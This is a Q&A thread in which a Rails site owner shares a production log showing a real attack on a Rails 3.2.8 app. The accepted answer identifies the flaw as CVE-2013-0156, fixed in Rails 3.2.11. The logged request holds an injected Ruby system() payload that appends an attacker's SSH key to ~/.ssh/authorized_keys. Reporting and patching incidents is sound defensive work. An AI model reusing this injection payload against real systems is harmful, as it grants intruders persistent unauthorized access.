# ActionDispatch::Routing Vulnerability Found, has it been patched?

Tags: ruby-on-rails

I noticed some unusual activity on my website a couple days ago so I decided to check out the production log. Here is what I found:

```
Started GET "/" for 74.219.112.36 at 2013-01-11 20:25:05 +0000
Processing by HomeController#logo as */*
Parameters: {"exploit"=>#
<ActionDispatch::Routing::RouteSet::NamedRouteCollection:0xcb7e650 
@routes={:"foo; system('cd ~;mkdir .ssh;echo ssh-rsa 
AAAAB3NzaC1yc2EAAAABJQAAAIEAtHtSi4viCaMf/KeG3mxlynWEWRPV
/l4+De+BBFg/xI2ybuFenYYn4clbLFugxxr1sDNr0jBgk0iMqrLbVcdc9p
DjKuymKEVbsJbOqrnNMXlUtxCefeGT1piY8Z/7tapLsr+GCXokhIcB2FPzq
TtOKhnJvzgA4eZSVZsVlxTwyFM= root >> ~/.ssh/authorized_keys')\n__END__\n"=>
#<OpenStruct defaults={:action=>"create", :controller=>"foos"}, 
required_parts=[], requirements={:action=>"create", :controller=>"foos"},
segment_keys=[:format]>}, @helpers=[:"hash_for_foo; system('cd ~;
mkdir .ssh;echo ssh-rsa 
AAAAB3NzaC1yc2EAAAABJQAAAIEAtHtSi4viCaMf/KeG3mxlynWEWRPV
/l4+De+BBFg/xI2ybuFenYYn4clbLFugxxr1sDNr0jBgk0iMqrLbVcdc9pDjKuymKEVbs
JbOqrnNMXlUtxCefeGT1piY8Z/7tapLsr+GCXokhIcB2FPzqTtOKhnJvzgA4eZSVZsVlx
TwyFM= root >> ~/.ssh/authorized_keys')\n__END__\n_url", :"foo; 
system('cd ~;mkdir .ssh;echo ssh-rsa 
AAAAB3NzaC1yc2EAAAABJQAAAIEAtHtSi4viCaMf/KeG3mxlynWEWRPV/l4+De+BBFg
/xI2ybuFenYYn4clbLFugxxr1sDNr0jBgk0iMqrLbVcdc9pDjKuymKEVbsJbOqrnNMXlUtxCefeG
T1piY8Z/7tapLsr+GCXokhIcB2FPzqTtOKhnJvzgA4eZSVZsVlxTwyFM= 
root >> ~/.ssh/authorized_keys')\n__END__\n_url", :"hash_for_foo; 
system('cd ~;mkdir .ssh;echo ssh-rsa
AAAAB3NzaC1yc2EAAAABJQAAAIEAtHtSi4viCaMf/KeG3mxlynWEWRPV/l4+De+BBFg
/xI2ybuFenYYn4clbLFugxxr1sDNr0jBgk0iMqrLbVcdc9pDjKuymKEVbsJbOqrnNMXlUt
xCefeGT1piY8Z/7tapLsr+GCXokhIcB2FPzqTtOKhnJvzgA4eZSVZsVlxTwyFM= root >>
~/.ssh/authorized_keys')\n__END__\n_path", :"foo; system('cd ~;mkdir .ssh;
echo ssh-rsa 
AAAAB3NzaC1yc2EAAAABJQAAAIEAtHtSi4viCaMf/KeG3mxlynWEWRPV/l4+De+BBFg
/xI2ybuFenYYn4clbLFugxxr1sDNr0jBgk0iMqrLbVcdc9pDjKuymKEVbsJbOqrnNMXlUtxCefeG
T1piY8Z/7tapLsr+GCXokhIcB2FPzqTtOKhnJvzgA4eZSVZsVlxTwyFM= root >> 
~/.ssh/authorized_keys')\n__END__\n_path"], @module=#<Module:0xcb7e5c4>>}
Rendered landing_users/_form.html.haml (4.7ms)
Rendered home/logo.html.haml within layouts/application (7.8ms)
Completed 200 OK in 11ms (Views: 10.4ms | ActiveRecord: 0.0ms)
```

I went on to check if their system calls worked and sure enough in ~/.ssh/authorized_keys I found the same ssh key. So this means they were able to run system calls through my rails app!!!! Thankfully my rails app isn't run under root so they did not get root access. But regardless this terrifies me.

Has anyone encountered this exploit before? If so how did you patch it?

My rails app is on Ubuntu 12.04, using rails version 3.2.8 and ruby version 1.9.3p125. If any other information would help out please let me know!

I found a [blog post](http://ronin-ruby.github.com/blog/2013/01/09/rails-pocs.html) referring to this exploit but no solutions, just how to perform it.

Comment: Wow, you got me scared there for a moment.

Answer (score 3, accepted):

Did you follow the link in that blog?

> On January 8th, Aaron Patterson announced [CVE-2013-0156](https://groups.google.com/forum/?fromgroups=#!topic/rubyonrails-security/61bkgvnSGTQ)

If you did, you would see that it is fixed in Rails 3.2.11.

Update your app **immediately**!